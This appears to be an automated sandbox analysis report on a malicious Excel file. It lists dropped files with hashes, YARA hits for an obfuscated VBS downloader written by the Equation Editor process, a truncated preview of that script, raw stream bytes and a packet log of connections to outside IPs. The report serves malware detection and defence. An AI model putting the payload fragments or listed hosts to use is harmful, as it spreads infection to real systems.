                                                                                            0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            PAGAMENTO CREDIT_AGRICOLE.docGet hashmaliciousXWormBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            PI-02911202409#.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6
                                                                                            PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                            • 142.215.209.78
                                                                                            • 188.114.97.6

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4760
                                                                                            Entropy (8bit):4.834060479684549
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbs

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (362), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):12576
                                                                                            Entropy (8bit):3.520843163776645
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:DLyCEdtat07VeUPWtPZm+4UhBzsGHRkfkr:P56tviBh4qBzsGHRk8r
                                                                                            MD5:6B3B1EA168BCFFB6331A923FC3D266F8
                                                                                            SHA1:A4C2F31FAAD3A36F3A8ACB383FCEFA4563807FB3
                                                                                            SHA-256:E8D997D89A442ADFB054C842DC67A259DF3C8577686A20F8A9C9E7239830815D
                                                                                            SHA-512:6EC1E10BE33258D2D30160A077B23670643331FAED7079C3931961D6E498379C2BD4F6EA244BC90E50CF23A0C7A7E63499C273278C3C3765E06EFC55919E3AF5
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbs, Author: Joe Security
                                                                                            Preview:..........F.u.n.c.t.i.o.n. .f.a.l.a.c.e.(.p.r.i.n.t.T.i.c.k.e.t.,. .s.c.r.i.p.t.C.o.n.t.e.x.t.,. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.)..... . . . .D.i.m. .d.e.s.l.a.s.s.o.,. .s.o.l.d.a.d.u.r.a..... . . . .S.e.t. .d.e.s.l.a.s.s.o. .=. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s...X.m.l.N.o.d.e..... . . . .S.e.t. .s.o.l.d.a.d.u.r.a. .=. .d.e.s.l.a.s.s.o...s.e.l.e.c.t.S.i.n.g.l.e.N.o.d.e.(.".p.s.f.:.P.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.".)......... . . . .I.f. .N.o.t. .s.o.l.d.a.d.u.r.a. .I.s. .N.o.t.h.i.n.g. .T.h.e.n..... . . . . . . . .D.i.m. .a.j.u.n.t.a.d.a.m.e.n.t.e.,. .c.r.e.s.p.i.r.,. .j.u.r.u.m.u.m.,. .t.r.a.n.q.u.i.t.o.,. .a.t.e.s.t.a.m.e.n.t.o..... . . . . . . . .S.e.t. .a.j.u.n.t.a.d.a.m.e.n.t.e. .=. .s.c.r.i.p.t.C.o.n.t.e.x.t...Q.u.e.u.e.P.r.o.p.e.r.t.i.e.s...G.e.t.R.e.a.d.S.t.r.e.a.m.A.s.X.M.L.(.".P.r.i.n.t.D.e.v.i.c.e.C.a.p.a.b.i.l.i.t.i.e.s.".)..... . . . . . . . .C.a.l.l. .t.u.c.u.m.a.n.(.a.j.u.n.t.a.d.a.m.e.n.t.e.)..... . . . . . . . ..... . . . . . . . .S.e.t. .c.r.e.s.p.i.r. .=. .a.

                                                                                            C:\Users\user\AppData\Local\Temp\bkvgzepn.rhy.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\hal10pud.jpy.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\wovlut0g.vej.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Local\Temp\z5l0pclt.lfa.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1

                                                                                            C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (362), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):12576
                                                                                            Entropy (8bit):3.520843163776645
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:DLyCEdtat07VeUPWtPZm+4UhBzsGHRkfkr:P56tviBh4qBzsGHRk8r
                                                                                            MD5:6B3B1EA168BCFFB6331A923FC3D266F8
                                                                                            SHA1:A4C2F31FAAD3A36F3A8ACB383FCEFA4563807FB3
                                                                                            SHA-256:E8D997D89A442ADFB054C842DC67A259DF3C8577686A20F8A9C9E7239830815D
                                                                                            SHA-512:6EC1E10BE33258D2D30160A077B23670643331FAED7079C3931961D6E498379C2BD4F6EA244BC90E50CF23A0C7A7E63499C273278C3C3765E06EFC55919E3AF5
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs, Author: Joe Security
                                                                                            Preview:..........F.u.n.c.t.i.o.n. .f.a.l.a.c.e.(.p.r.i.n.t.T.i.c.k.e.t.,. .s.c.r.i.p.t.C.o.n.t.e.x.t.,. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.)..... . . . .D.i.m. .d.e.s.l.a.s.s.o.,. .s.o.l.d.a.d.u.r.a..... . . . .S.e.t. .d.e.s.l.a.s.s.o. .=. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s...X.m.l.N.o.d.e..... . . . .S.e.t. .s.o.l.d.a.d.u.r.a. .=. .d.e.s.l.a.s.s.o...s.e.l.e.c.t.S.i.n.g.l.e.N.o.d.e.(.".p.s.f.:.P.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.".)......... . . . .I.f. .N.o.t. .s.o.l.d.a.d.u.r.a. .I.s. .N.o.t.h.i.n.g. .T.h.e.n..... . . . . . . . .D.i.m. .a.j.u.n.t.a.d.a.m.e.n.t.e.,. .c.r.e.s.p.i.r.,. .j.u.r.u.m.u.m.,. .t.r.a.n.q.u.i.t.o.,. .a.t.e.s.t.a.m.e.n.t.o..... . . . . . . . .S.e.t. .a.j.u.n.t.a.d.a.m.e.n.t.e. .=. .s.c.r.i.p.t.C.o.n.t.e.x.t...Q.u.e.u.e.P.r.o.p.e.r.t.i.e.s...G.e.t.R.e.a.d.S.t.r.e.a.m.A.s.X.M.L.(.".P.r.i.n.t.D.e.v.i.c.e.C.a.p.a.b.i.l.i.t.i.e.s.".)..... . . . . . . . .C.a.l.l. .t.u.c.u.m.a.n.(.a.j.u.n.t.a.d.a.m.e.n.t.e.)..... . . . . . . . ..... . . . . . . . .S.e.t. .c.r.e.s.p.i.r. .=. .a.

                                                                                            C:\Users\user\Desktop\~$fUHl7rElXU.xls

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):1.4377382811115937
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                            Malicious:false
                                                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                            C:\Users\user\Desktop\~$fUHl7rElXU.xlsx

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):1.4377382811115937
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                            Malicious:true
                                                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:Microsoft Excel 2007+
                                                                                            Entropy (8bit):7.997778283142767
                                                                                            TrID:
                                                                                            • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                                                            • ZIP compressed archive (8000/1) 18.60%
                                                                                            File name:fUHl7rElXU.xlsx
                                                                                            File size:635'709 bytes
                                                                                            MD5:ce37f3ed03a2664795b50ad1966b81e8
                                                                                            SHA1:34636b9da429754b4c21cae7c78688e4a79040d1
                                                                                            SHA256:b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428
                                                                                            SHA512:a3e5bef5a8771d3d0b9a7091466128cd1394816bfe0b915b0cb8697715812fa5c94ff4b74f61aca276b29471748710d44a5f9014deeed5ab9c3b8fb25fd7ceb7
                                                                                            SSDEEP:12288:4zsvv6a2wiAeUTeS7djh7XK1hfHIXN7XyU4bozJAYMiiuWcktquW:4pa2DH+djhL0damMaZDhtzW
                                                                                            TLSH:41D423225DC20C49EE04273F65336680B90729B674C2705F5BE6E973B54B25FE2B6BC2
                                                                                            File Content Preview:PK........NxtY..TC....G.......[Content_Types].xmlUT.....=g..=g..=g..Mo.0.......].[...E.......h..i..... .......(.%N.\l.$...>.w.....d...U5..:..q.Z.z.Y^...8..;...I..~.....R...j...n.$.b.T...#S.;H..g2.........T.%t.LYC...p..6.....8i....&/.j.!X. qX....R...(.^.w\

                                                                                            File Icon

                                                                                            Icon Hash:2562ab89a7b7bfbf

                                                                                            Static OLE Info

                                                                                            General

                                                                                            Document Type:OpenXML
                                                                                            Number of OLE Files:1

                                                                                            OLE File "fUHl7rElXU.xlsx"

                                                                                            Indicators
                                                                                            Has Summary Info:
                                                                                            Application Name:
                                                                                            Encrypted Document:False
                                                                                            Contains Word Document Stream:False
                                                                                            Contains Workbook/Book Stream:False
                                                                                            Contains PowerPoint Document Stream:False
                                                                                            Contains Visio Document Stream:False
                                                                                            Contains ObjectPool Stream:False
                                                                                            Flash Objects Count:0
                                                                                            Contains VBA Macros:False
                                                                                            Summary
                                                                                            Author:Mancilla, Jesus
                                                                                            Last Saved By:USER
                                                                                            Total Edit Time:0
                                                                                            Create Time:2022-08-10T18:51:50Z
                                                                                            Last Saved Time:2023-08-08T20:02:56Z
                                                                                            Creating Application:Microsoft Excel
                                                                                            Security:0
                                                                                            Document Summary
                                                                                            Thumbnail Scaling Desired:false
                                                                                            Company:
                                                                                            Contains Dirty Links:false
                                                                                            Shared Document:false
                                                                                            Changed Hyperlinks:false
                                                                                            Application Version:16.0300

                                                                                            Streams

                                                                                            Stream Path: \x1OlE10nAtIVe, File Type: data, Stream Size: 831415
                                                                                            General
                                                                                            Stream Path:\x1OlE10nAtIVe
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:831415
                                                                                            Entropy:5.988642634301528
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:L j . . . l O r . . V 9 w * . x E . ] . 3 O . 9 V . . R f . a s . E . O \\ + = ` . s [ s ; . I . . . 8 H D G . . C ! p . 4 . t 3 @ * : V H + m ' c k . T p . @ T * 3 . ^ 6 ? . e . * I W . . G . g B & W 5 Z P ! . ~ . . p x t ^ . . . . . X . . . . . . . . . . - + . . . . . . t i 5 @ . . % . . 1 . k . S . P X S . . P . . a f s D 9 . U 6 R Q 5 . . ^ = . . Y Z R r o . . * . . w V . . 5 . . Z [ 9 W _ r Q . . . e [ . . . = h 0 . . O . b & * o 7 8 _ + ) . . ^ s . ' L Q f c ] J H 9 , ` 9 C / Y . . M A M . . . S .
                                                                                            Data Raw:4c 6a 1a 01 03 da 6c 4f b0 72 01 08 56 39 bd b8 77 2a 01 81 c5 78 45 1b ff 8b 5d 0c 8b 33 b9 4f 98 b9 ff f7 d1 8b 39 56 ff d7 05 14 9f 52 66 05 c9 61 ad 99 ff e0 aa ef 73 eb 91 1c 45 00 db 4f 5c f5 e5 9a c1 2b 3d bd 60 b2 11 73 5b ce 73 96 f1 3b c8 b9 c1 49 d9 10 ec cb f8 e9 8e 8b bf 1c b7 38 e4 48 8e a7 44 ed 47 11 f8 da 7f c1 b2 43 b9 9c af a1 fa 9a ec 21 70 b3 0e 34 db 8e 74 33
                                                                                            Stream Path: AuJEDWQ9tMde, File Type: empty, Stream Size: 0
                                                                                            General
                                                                                            Stream Path:AuJEDWQ9tMde
                                                                                            CLSID:
                                                                                            File Type:empty
                                                                                            Stream Size:0
                                                                                            Entropy:0.0
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:
                                                                                            Data Raw:

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 4, 2024 12:20:59.309797049 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:20:59.429649115 CET8049163104.168.7.19192.168.2.22
                                                                                            Dec 4, 2024 12:20:59.429703951 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:20:59.429972887 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:20:59.549706936 CET8049163104.168.7.19192.168.2.22
                                                                                            Dec 4, 2024 12:21:00.548499107 CET8049163104.168.7.19192.168.2.22
                                                                                            Dec 4, 2024 12:21:00.548566103 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:21:00.548574924 CET8049163104.168.7.19192.168.2.22
                                                                                            Dec 4, 2024 12:21:00.548628092 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:21:01.116889000 CET4916380192.168.2.22104.168.7.19
                                                                                            Dec 4, 2024 12:21:01.568233013 CET4916480192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:01.687973976 CET8049164188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:01.688041925 CET4916480192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:01.688338995 CET4916480192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:01.809406042 CET8049164188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:02.969011068 CET8049164188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:02.969424963 CET4916480192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:02.970428944 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:02.970474958 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:02.970547915 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:02.971913099 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:02.971925020 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:03.090003014 CET8049164188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:03.090080976 CET4916480192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.201492071 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.201616049 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.205943108 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.205961943 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.206286907 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.278888941 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.319329023 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899513006 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899583101 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899641991 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.899667025 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899817944 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899852991 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899883032 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.899892092 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.899939060 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.902342081 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.960725069 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:04.960865021 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:04.960887909 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.019418955 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.019589901 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.019603014 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.023597956 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.023668051 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.023677111 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.095663071 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.095700979 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.095737934 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.095777988 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.095856905 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.104036093 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.112458944 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.112535954 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.112549067 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.120753050 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.120855093 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.120863914 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.129260063 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.129349947 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.129358053 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.137614965 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.137681007 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.137689114 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.146157026 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.146234035 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.146243095 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.157258034 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.157363892 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.157372952 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.163455009 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.163513899 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.163522959 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.169735909 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.169809103 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.169817924 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.182116032 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.182195902 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.182220936 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.182230949 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.182286024 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.188582897 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.283579111 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.283657074 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.283678055 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.290445089 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.290514946 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.290525913 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.299737930 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.299746990 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.299832106 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.299848080 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.308770895 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.308878899 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.308895111 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.313179970 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.313288927 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.313297987 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.317321062 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.317440033 CET49165443192.168.2.22188.114.97.6
                                                                                            Dec 4, 2024 12:21:05.317447901 CET44349165188.114.97.6192.168.2.22
                                                                                            Dec 4, 2024 12:21:05.325484037 CET44349165188.114.97.6192.168.2.22
